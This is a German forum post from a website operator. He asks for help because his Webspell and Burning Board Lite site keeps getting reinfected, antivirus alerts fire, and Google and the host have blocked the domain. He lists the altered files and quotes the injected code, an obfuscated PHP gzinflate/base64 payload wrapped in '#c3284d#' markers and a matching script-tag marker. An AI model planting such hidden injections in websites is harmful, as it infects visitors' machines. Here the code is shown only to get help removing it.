servus
Seit einigen Wochen habe ich nun Kopfzerbrechen und finde nirgends wirklich Hilfe!
Da wir nun Jahre lang auf Webspell setzten und hier auch Qualifizierte Leute anwesend sind wollte ich es auch mal hier versuchen.
Das Problem ist folgender:
Seit vielen Wochen schlagen die Antivir Programmer vieler thedaemon.de Besucher Alarm.
Hab mehrmals Schadhafte Scriptteile gefunden(interessant wie die dahin gelangen) sie auch gelöscht.
Vor ca. 1-2 Wochen wurd dann zum ersten mal die Domain von Google und von der Technik Abteilung unseren Webspace host geschlossen. Hab wie schon oft in Foren gelesen:
einen Datenbank Backup gemacht. Alles vom Space gelöscht und die neueste Version installiert!(unten mehr dazu)
Es lief wieder aber bis zum 16.07.12 hielt das Ganze leider nur!
Zwar schlägt Google folgendes vor:
http://www.stopbadware.org/home/security damit aber kann ich nichts anfangen
Was würdet ihr an meiner stelle machen?
Die Scripte die auf dem Server laufen:
Webspell 4.2.3a (thedaemon.de/page)
Burning Board Lite 2.0.1 (thedaemon.de/forum)
(Die FTP Daten wurden auch geändert!)
Was mir aufgefallen ist:
auf dem Server werden folgende Datein geändert:
Webspell:
index.php
checklogin.php
admin/index.php
templates/clanwar_edit.html
templates/clanwar_new.html
BurningBoardLite:
index.php
acp/index.php
wcf\templates\compiled\27_0_2_board.php
wcf\templates\compiled\27_0_2_index.php
wcf\templates\compiled\27_0_2_postAdd.php
wcf\templates\compiled\27_0_2_postEdit.php
wcf\templates\compiled\27_0_2_thread.php
wcf\templates\compiled\27_0_2_threadAdd.php
wcf\templates\compiled\27_0_3_index.php
Ich kann unmöglich alle Dateien manuel danach absuchen
Die Enterpage(index.html),da soll auch was drauf sein.
Beim runterladen ist er kurz auf dem Desktop, aber nach spätestens 30-60 sekunden popt von Windows7 Essentiells eine grüne Meldung und die Datei verschwindet. Die Datei lässt sich auch nicht öffnen!
So sieht der Teil aus:
Code:
| #c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw==")));
#c3284d# |
Code:
| !--c3284d--><script>
</script><!--/c3284d--> |
EDIT// 17:50Uhr 18.07.12
The following are example URLs from your site where we found such content:
http://www.thedaemon.d...e1efd5d836a9cf93cc7ffd875
http://www.thedaemon.d...e1efd5d836a9cf93cc7ffd875
Wenn ich das lösche hab ich paar Minuten Ruhe und dann steht es wieder da wo es vorher stand
Kurz ich bin am verzeifeln. Weiß nicht mehr weiter!
Hoffe ihr könnt uns da weiter helfen!
LG Burak B. / Radonaktiv